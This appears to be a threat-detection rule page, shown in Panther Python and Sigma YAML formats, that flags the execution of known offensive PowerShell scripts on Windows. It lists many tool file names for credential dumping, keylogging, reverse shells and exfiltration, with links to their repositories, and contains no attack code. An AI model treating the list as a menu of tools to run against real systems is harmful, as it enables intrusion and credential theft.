            - '\Invoke-PowerShellTcpOneLineBind.ps1'
            - '\Invoke-PowerShellUdp.ps1'
            - '\Invoke-PowerShellUdpOneLine.ps1'
            - '\Invoke-PowerShellWMI.ps1'
            - '\Invoke-PowerThIEf.ps1'
            - '\Invoke-PPLDump.ps1'
            - '\Invoke-Prasadhak.ps1'
            - '\Invoke-PsExec.ps1'
            - '\Invoke-PsGcat.ps1'
            - '\Invoke-PsGcatAgent.ps1'
            - '\Invoke-PSInject.ps1'
            - '\Invoke-PsUaCme.ps1'
            - '\Invoke-ReflectivePEInjection.ps1'
            - '\Invoke-ReverseDNSLookup.ps1'
            - '\Invoke-Rubeus.ps1'
            - '\Invoke-RunAs.ps1'
            - '\Invoke-SafetyKatz.ps1'
            - '\Invoke-SauronEye.ps1'
            - '\Invoke-SCShell.ps1'
            - '\Invoke-Seatbelt.ps1'
            - '\Invoke-ServiceAbuse.ps1'
            - '\Invoke-SessionGopher.ps1'
            - '\Invoke-ShellCode.ps1'
            - '\Invoke-SMBScanner.ps1'
            - '\Invoke-Snaffler.ps1'
            - '\Invoke-Spoolsample.ps1'
            - '\Invoke-SSHCommand.ps1'
            - '\Invoke-SSIDExfil.ps1'
            - '\Invoke-StandIn.ps1'
            - '\Invoke-StickyNotesExtract.ps1'
            - '\Invoke-Tater.ps1'
            - '\Invoke-Thunderfox.ps1'
            - '\Invoke-ThunderStruck.ps1'
            - '\Invoke-TokenManipulation.ps1'
            - '\Invoke-Tokenvator.ps1'
            - '\Invoke-TotalExec.ps1'
            - '\Invoke-UrbanBishop.ps1'
            - '\Invoke-UserHunter.ps1'
            - '\Invoke-VoiceTroll.ps1'
            - '\Invoke-Whisker.ps1'
            - '\Invoke-WinEnum.ps1'
            - '\Invoke-winPEAS.ps1'
            - '\Invoke-WireTap.ps1'
            - '\Invoke-WmiCommand.ps1'
            - '\Invoke-WScriptBypassUAC.ps1'
            - '\Invoke-Zerologon.ps1'
            - '\Keylogger.ps1'
            - '\MailRaider.ps1'
            - '\New-HoneyHash.ps1'
            - '\OfficeMemScraper.ps1'
            - '\Offline_Winpwn.ps1'
            - '\Out-CHM.ps1'
            - '\Out-DnsTxt.ps1'
            - '\Out-Excel.ps1'
            - '\Out-HTA.ps1'
            - '\Out-Java.ps1'
            - '\Out-JS.ps1'
            - '\Out-Minidump.ps1'
            - '\Out-RundllCommand.ps1'
            - '\Out-SCF.ps1'
            - '\Out-SCT.ps1'
            - '\Out-Shortcut.ps1'
            - '\Out-WebQuery.ps1'
            - '\Out-Word.ps1'
            - '\Parse_Keys.ps1'
            - '\Port-Scan.ps1'
            - '\PowerBreach.ps1'
            - '\powercat.ps1'
            - '\Powermad.ps1'
            - '\PowerRunAsSystem.psm1'
            - '\PowerSharpPack.ps1'
            - '\PowerUp.ps1'
            - '\PowerUpSQL.ps1'
            - '\PowerView.ps1'
            - '\PSAsyncShell.ps1'
            - '\RemoteHashRetrieval.ps1'
            - '\Remove-Persistence.ps1'
            - '\Remove-PoshRat.ps1'
            - '\Remove-Update.ps1'
            - '\Run-EXEonRemote.ps1'
            - '\Schtasks-Backdoor.ps1'
            - '\Set-DCShadowPermissions.ps1'
            - '\Set-MacAttribute.ps1'
            - '\Set-RemotePSRemoting.ps1'
            - '\Set-RemoteWMI.ps1'
            - '\Set-Wallpaper.ps1'
            - '\Show-TargetScreen.ps1'
            - '\Speak.ps1'
            - '\Start-CaptureServer.ps1'
            - '\Start-WebcamRecorder.ps1'
            - '\StringToBase64.ps1'
            - '\TexttoExe.ps1'
            - '\Veeam-Get-Creds.ps1'
            - '\VolumeShadowCopyTools.ps1'
            - '\WinPwn.ps1'
            - '\WSUSpendu.ps1'
    selection_invoke_sharp:
        TargetFilename|contains: 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
        TargetFilename|endswith: '.ps1'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high
high
Malicious PowerShell Scripts - PoshModule
Detects the execution of known offensive PowerShell scripts used for exploitation or reconnaissance
status test author frack113, Nasreddine Bencherchali (Nextron Systems) id 41025fd7-0466-4650-a813-574aaacbe7f4
panther query
def rule(event):
    if any(
        [
            any(
                [
                    "Add-ConstrainedDelegationBackdoor.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Add-Exfiltration.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-Persistence.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-RegBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-RemoteRegBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Add-ScrnSaveBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "BadSuccessor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Check-VM.ps1" in event.deep_get("ContextInfo", default=""),
                    "ConvertTo-ROT13.ps1" in event.deep_get("ContextInfo", default=""),
                    "Copy-VSS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Create-MultipleSessions.ps1" in event.deep_get("ContextInfo", default=""),
                    "DNS_TXT_Pwnage.ps1" in event.deep_get("ContextInfo", default=""),
                    "dnscat2.ps1" in event.deep_get("ContextInfo", default=""),
                    "Do-Exfiltration.ps1" in event.deep_get("ContextInfo", default=""),
                    "DomainPasswordSpray.ps1" in event.deep_get("ContextInfo", default=""),
                    "Download_Execute.ps1" in event.deep_get("ContextInfo", default=""),
                    "Download-Execute-PS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Enabled-DuplicateToken.ps1" in event.deep_get("ContextInfo", default=""),
                    "Enable-DuplicateToken.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-Command-MSSQL.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-DNSTXT-Code.ps1" in event.deep_get("ContextInfo", default=""),
                    "Execute-OnTime.ps1" in event.deep_get("ContextInfo", default=""),
                    "ExetoText.ps1" in event.deep_get("ContextInfo", default=""),
                    "Exploit-Jboss.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-AVSignature.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-Fruit.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-GPOLocation.ps1" in event.deep_get("ContextInfo", default=""),
                    "Find-TrustedDocuments.ps1" in event.deep_get("ContextInfo", default=""),
                    "FireBuster.ps1" in event.deep_get("ContextInfo", default=""),
                    "FireListener.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ApplicationHost.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ChromeDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ClipboardContents.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ComputerDetail.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-FoxDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-GPPAutologon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-GPPPassword.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-IndexedItem.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Keystrokes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-LSASecret.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-MicrophoneAudio.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-PassHashes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-PassHints.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RegAlwaysInstallElevated.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RegAutoLogon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-RickAstley.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Screenshot.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-SecurityPackages.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServiceFilePermission.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServicePermission.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-ServiceUnquoted.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-SiteListPassword.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-System.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-TimedScreenshot.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-UnattendedInstallFile.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-Unconstrained.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-USBKeystrokes.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VaultCredential.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VulnAutoRun.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-VulnSchTask.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WebConfig.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WebCredentials.ps1" in event.deep_get("ContextInfo", default=""),
                    "Get-WLAN-Keys.ps1" in event.deep_get("ContextInfo", default=""),
                    "Gupt-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "HTTP-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "HTTP-Login.ps1" in event.deep_get("ContextInfo", default=""),
                    "Install-ServiceBinary.ps1" in event.deep_get("ContextInfo", default=""),
                    "Install-SSP.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ACLScanner.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ADSBackdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-AmsiBypass.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ARPScan.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BackdoorLNK.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BadPotato.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BetterSafetyKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BruteForce.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-BypassUAC.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Carbuncle.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Certify.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ConPtyShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-CredentialInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-CredentialsPhish.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DAFT.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DCSync.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Decode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DinvokeKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DllInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DNSExfiltrator.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-DowngradeAccount.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-EgressCheck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Encode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-EventViewer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Eyewitness.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-FakeLogonScreen.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Farmer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Get-RBCD-Threaded.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Gopher.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Grouper2.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Grouper3.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-HandleKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Interceptor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Internalmonologue.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Inveigh.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-InveighRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-JSRatRegsvr.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-JSRatRundll.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-KrbRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-KrbRelayUp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-LdapSignCheck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Lockless.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MalSCCM.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Mimikatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MimikatzWDigestDowngrade.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Invoke-Mimikittenz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-MITM6.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NanoDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NetRipper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NetworkRelay.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-NinjaCopy.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-OxidResolver.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-P0wnedshell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-P0wnedshellx86.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Paranoia.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PortScan.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PoshRatHttp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PoshRatHttps.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PostExfil.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerDPAPI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellIcmp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTCP.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTcpOneLine.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellTcpOneLineBind.ps1"
                    in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellUdp.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellUdpOneLine.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerShellWMI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PowerThIEf.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PPLDump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Prasadhak.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsExec.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsGcat.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsGcatAgent.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PSInject.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-PsUaCme.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ReflectivePEInjection.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ReverseDNSLookup.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Rubeus.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-RunAs.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SafetyKatz.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SauronEye.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SCShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Seatbelt.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ServiceAbuse.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SessionGopher.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ShellCode.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SMBScanner.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Snaffler.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Spoolsample.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SSHCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-SSIDExfil.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-StandIn.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-StickyNotesExtract.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Tater.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Thunderfox.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-ThunderStruck.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-TokenManipulation.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Tokenvator.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-TotalExec.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-UrbanBishop.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-UserHunter.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-VoiceTroll.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Whisker.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WinEnum.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-winPEAS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WireTap.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WmiCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-WScriptBypassUAC.ps1" in event.deep_get("ContextInfo", default=""),
                    "Invoke-Zerologon.ps1" in event.deep_get("ContextInfo", default=""),
                    "Keylogger.ps1" in event.deep_get("ContextInfo", default=""),
                    "MailRaider.ps1" in event.deep_get("ContextInfo", default=""),
                    "New-HoneyHash.ps1" in event.deep_get("ContextInfo", default=""),
                    "OfficeMemScraper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Offline_Winpwn.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-CHM.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-DnsTxt.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Excel.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-HTA.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Java.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-JS.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Minidump.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-RundllCommand.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-SCF.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-SCT.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Shortcut.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-WebQuery.ps1" in event.deep_get("ContextInfo", default=""),
                    "Out-Word.ps1" in event.deep_get("ContextInfo", default=""),
                    "Parse_Keys.ps1" in event.deep_get("ContextInfo", default=""),
                    "Port-Scan.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerBreach.ps1" in event.deep_get("ContextInfo", default=""),
                    "powercat.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerRunAsSystem.psm1" in event.deep_get("ContextInfo", default=""),
                    "PowerSharpPack.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerUp.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerUpSQL.ps1" in event.deep_get("ContextInfo", default=""),
                    "PowerView.ps1" in event.deep_get("ContextInfo", default=""),
                    "PSAsyncShell.ps1" in event.deep_get("ContextInfo", default=""),
                    "RemoteHashRetrieval.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-Persistence.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-PoshRat.ps1" in event.deep_get("ContextInfo", default=""),
                    "Remove-Update.ps1" in event.deep_get("ContextInfo", default=""),
                    "Run-EXEonRemote.ps1" in event.deep_get("ContextInfo", default=""),
                    "Schtasks-Backdoor.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-DCShadowPermissions.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-MacAttribute.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-RemotePSRemoting.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-RemoteWMI.ps1" in event.deep_get("ContextInfo", default=""),
                    "Set-Wallpaper.ps1" in event.deep_get("ContextInfo", default=""),
                    "Show-TargetScreen.ps1" in event.deep_get("ContextInfo", default=""),
                    "Speak.ps1" in event.deep_get("ContextInfo", default=""),
                    "Start-CaptureServer.ps1" in event.deep_get("ContextInfo", default=""),
                    "Start-WebcamRecorder.ps1" in event.deep_get("ContextInfo", default=""),
                    "StringToBase64.ps1" in event.deep_get("ContextInfo", default=""),
                    "TexttoExe.ps1" in event.deep_get("ContextInfo", default=""),
                    "Veeam-Get-Creds.ps1" in event.deep_get("ContextInfo", default=""),
                    "VolumeShadowCopyTools.ps1" in event.deep_get("ContextInfo", default=""),
                    "WinPwn.ps1" in event.deep_get("ContextInfo", default=""),
                    "WSUSpendu.ps1" in event.deep_get("ContextInfo", default=""),
                ]
            ),
            all(
                [
                    "Invoke-Sharp" in event.deep_get("ContextInfo", default=""),
                    ".ps1" in event.deep_get("ContextInfo", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious PowerShell Scripts - PoshModule
id: 41025fd7-0466-4650-a813-574aaacbe7f4
related:
    - id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
      type: similar
    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2
      type: obsolete
status: test
description: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
references:
    - https://github.com/PowerShellMafia/PowerSploit
    - https://github.com/NetSPI/PowerUpSQL
    - https://github.com/CsEnox/EventViewer-UACBypass
    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu
    - https://github.com/nettitude/Invoke-PowerThIEf
    - https://github.com/S3cur3Th1sSh1t/WinPwn
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-23
modified: 2025-12-10
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_module
    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
    selection_generic:
        ContextInfo|contains:
            - 'Add-ConstrainedDelegationBackdoor.ps1'
            - 'Add-Exfiltration.ps1'
            - 'Add-Persistence.ps1'
            - 'Add-RegBackdoor.ps1'
            - 'Add-RemoteRegBackdoor.ps1'
            - 'Add-ScrnSaveBackdoor.ps1'
            - 'BadSuccessor.ps1'
            - 'Check-VM.ps1'
            - 'ConvertTo-ROT13.ps1'
            - 'Copy-VSS.ps1'
            - 'Create-MultipleSessions.ps1'
            - 'DNS_TXT_Pwnage.ps1'
            - 'dnscat2.ps1'
            - 'Do-Exfiltration.ps1'
            - 'DomainPasswordSpray.ps1'
            - 'Download_Execute.ps1'
            - 'Download-Execute-PS.ps1'
            - 'Enabled-DuplicateToken.ps1'
            - 'Enable-DuplicateToken.ps1'
            - 'Execute-Command-MSSQL.ps1'
            - 'Execute-DNSTXT-Code.ps1'
            - 'Execute-OnTime.ps1'
            - 'ExetoText.ps1'
            - 'Exploit-Jboss.ps1'
            - 'Find-AVSignature.ps1'
            - 'Find-Fruit.ps1'
            - 'Find-GPOLocation.ps1'
            - 'Find-TrustedDocuments.ps1'
            - 'FireBuster.ps1'
            - 'FireListener.ps1'
            - 'Get-ApplicationHost.ps1'
            - 'Get-ChromeDump.ps1'
            - 'Get-ClipboardContents.ps1'
            - 'Get-ComputerDetail.ps1'
            - 'Get-FoxDump.ps1'
            - 'Get-GPPAutologon.ps1'
            - 'Get-GPPPassword.ps1'
            - 'Get-IndexedItem.ps1'
            - 'Get-Keystrokes.ps1'
            - 'Get-LSASecret.ps1'
            - 'Get-MicrophoneAudio.ps1'
            - 'Get-PassHashes.ps1'
            - 'Get-PassHints.ps1'
            - 'Get-RegAlwaysInstallElevated.ps1'
            - 'Get-RegAutoLogon.ps1'
            - 'Get-RickAstley.ps1'
            - 'Get-Screenshot.ps1'
            - 'Get-SecurityPackages.ps1'
            - 'Get-ServiceFilePermission.ps1'
            - 'Get-ServicePermission.ps1'
            - 'Get-ServiceUnquoted.ps1'
            - 'Get-SiteListPassword.ps1'
            - 'Get-System.ps1'
            - 'Get-TimedScreenshot.ps1'
            - 'Get-UnattendedInstallFile.ps1'
            - 'Get-Unconstrained.ps1'
            - 'Get-USBKeystrokes.ps1'
            - 'Get-VaultCredential.ps1'
            - 'Get-VulnAutoRun.ps1'
            - 'Get-VulnSchTask.ps1'
            - 'Get-WebConfig.ps1'
            - 'Get-WebCredentials.ps1'
            - 'Get-WLAN-Keys.ps1'
            - 'Gupt-Backdoor.ps1'
            - 'HTTP-Backdoor.ps1'
            - 'HTTP-Login.ps1'
            - 'Install-ServiceBinary.ps1'
            - 'Install-SSP.ps1'
            - 'Invoke-ACLScanner.ps1'
            - 'Invoke-ADSBackdoor.ps1'
            - 'Invoke-AmsiBypass.ps1'
            - 'Invoke-ARPScan.ps1'
            - 'Invoke-BackdoorLNK.ps1'
            - 'Invoke-BadPotato.ps1'
            - 'Invoke-BetterSafetyKatz.ps1'
            - 'Invoke-BruteForce.ps1'
            - 'Invoke-BypassUAC.ps1'
            - 'Invoke-Carbuncle.ps1'
            - 'Invoke-Certify.ps1'
            - 'Invoke-ConPtyShell.ps1'
            - 'Invoke-CredentialInjection.ps1'
            - 'Invoke-CredentialsPhish.ps1'
            - 'Invoke-DAFT.ps1'
            - 'Invoke-DCSync.ps1'
            - 'Invoke-Decode.ps1'
            - 'Invoke-DinvokeKatz.ps1'
            - 'Invoke-DllInjection.ps1'
            - 'Invoke-DNSExfiltrator.ps1'
            - 'Invoke-DowngradeAccount.ps1'
            - 'Invoke-EgressCheck.ps1'
            - 'Invoke-Encode.ps1'
            - 'Invoke-EventViewer.ps1'
            - 'Invoke-Eyewitness.ps1'
            - 'Invoke-FakeLogonScreen.ps1'
            - 'Invoke-Farmer.ps1'
            - 'Invoke-Get-RBCD-Threaded.ps1'
            - 'Invoke-Gopher.ps1'
            - 'Invoke-Grouper2.ps1'
            - 'Invoke-Grouper3.ps1'
            - 'Invoke-HandleKatz.ps1'
            - 'Invoke-Interceptor.ps1'
            - 'Invoke-Internalmonologue.ps1'
            - 'Invoke-Inveigh.ps1'
            - 'Invoke-InveighRelay.ps1'
            - 'Invoke-JSRatRegsvr.ps1'
            - 'Invoke-JSRatRundll.ps1'
            - 'Invoke-KrbRelay.ps1'
            - 'Invoke-KrbRelayUp.ps1'
            - 'Invoke-LdapSignCheck.ps1'
            - 'Invoke-Lockless.ps1'
            - 'Invoke-MalSCCM.ps1'
            - 'Invoke-Mimikatz.ps1'
            - 'Invoke-MimikatzWDigestDowngrade.ps1'
            - 'Invoke-Mimikittenz.ps1'
            - 'Invoke-MITM6.ps1'
            - 'Invoke-NanoDump.ps1'
            - 'Invoke-NetRipper.ps1'
            - 'Invoke-NetworkRelay.ps1'
            - 'Invoke-NinjaCopy.ps1'
            - 'Invoke-OxidResolver.ps1'
            - 'Invoke-P0wnedshell.ps1'
            - 'Invoke-P0wnedshellx86.ps1'
            - 'Invoke-Paranoia.ps1'
            - 'Invoke-PortScan.ps1'
            - 'Invoke-PoshRatHttp.ps1'
            - 'Invoke-PoshRatHttps.ps1'
            - 'Invoke-PostExfil.ps1'
            - 'Invoke-PowerDump.ps1'
            - 'Invoke-PowerDPAPI.ps1'
            - 'Invoke-PowerShellIcmp.ps1'
            - 'Invoke-PowerShellTCP.ps1'
            - 'Invoke-PowerShellTcpOneLine.ps1'
            - 'Invoke-PowerShellTcpOneLineBind.ps1'
            - 'Invoke-PowerShellUdp.ps1'
            - 'Invoke-PowerShellUdpOneLine.ps1'
            - 'Invoke-PowerShellWMI.ps1'
            - 'Invoke-PowerThIEf.ps1'
            - 'Invoke-PPLDump.ps1'
            - 'Invoke-Prasadhak.ps1'
            - 'Invoke-PsExec.ps1'
            - 'Invoke-PsGcat.ps1'
            - 'Invoke-PsGcatAgent.ps1'
            - 'Invoke-PSInject.ps1'
            - 'Invoke-PsUaCme.ps1'
            - 'Invoke-ReflectivePEInjection.ps1'
